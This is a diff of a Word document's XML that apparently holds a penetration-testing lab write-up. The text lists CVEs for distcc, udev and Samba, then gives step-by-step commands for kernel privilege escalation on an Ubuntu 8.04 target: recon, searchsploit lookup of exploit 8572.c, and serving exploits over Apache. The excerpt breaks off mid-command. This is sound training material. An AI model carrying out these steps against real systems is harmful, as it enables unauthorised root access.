+        <w:t xml:space="preserve"> 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
+          <w:color w:val="858585"/>
+          <w:spacing w:val="3"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CVE2: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId13" w:tooltip="CVE-2009-1185 security vulnerability details" w:history="1">
+        <w:r>
+          <w:rPr>
             <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-            <w:color w:val="4183C4"/>
+            <w:color w:val="858585"/>
             <w:spacing w:val="3"/>
             <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           </w:rPr>
-          <w:t>http://www.cvedetails.com/cve/CVE-2007-2447/</w:t>
+          <w:t>CVE-2009-1185</w:t>
         </w:r>
       </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
-          <w:color w:val="333333"/>
-          <w:spacing w:val="3"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Samba is software that can be run on a platform other than Microsoft Windows, for example, UNIX, Linux, IBM System 390, OpenVMS, and other operating systems. Samba uses the TCP/IP protocol that is installed on the host server. When correctly configured, it allows that host to interact with a Microsoft Windows client or server as if it is a Windows file and print server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
           <w:color w:val="858585"/>
           <w:spacing w:val="3"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
@@ -1894,48 +1729,2334 @@
           <w:spacing w:val="3"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Exploit CVE 2007-2447; The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>udev</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
           <w:color w:val="858585"/>
           <w:spacing w:val="3"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
-          <w:color w:val="858585"/>
-          <w:spacing w:val="3"/>
+        <w:t xml:space="preserve"> before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:rPr>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ll steps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>To escalate privileges, you need a kernel exploit. So the first task is to find out what kernel version the target uses.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, in the command shell, execute these commands.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>uname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>lsb_release</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>The target has kernel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2.6.24</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> and is running </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Ubuntu 8.04</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, as shown below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A4BDC16" wp14:editId="6373A9FB">
+            <wp:extent cx="5943600" cy="1104900"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="8" name="图片 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1104900"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>Finding Exploits</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>On Kali, open a new Terminal and execute this command, to find exploits that escalate privileges on this kernel.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> privilege | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>grep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>linux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>grep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kernel | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>grep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2.6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>We'll use the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>8572.c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t> exploit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552FB516" wp14:editId="002F9585">
+            <wp:extent cx="5943600" cy="3472815"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="13" name="图片 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3472815"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Serving the Exploit with Apache</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>On Kali, execute these command to restart apache2, and make a symbolic link that will make all the exploits available for download.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>service apache2 restart</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ln -s /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/share/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>exploitdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
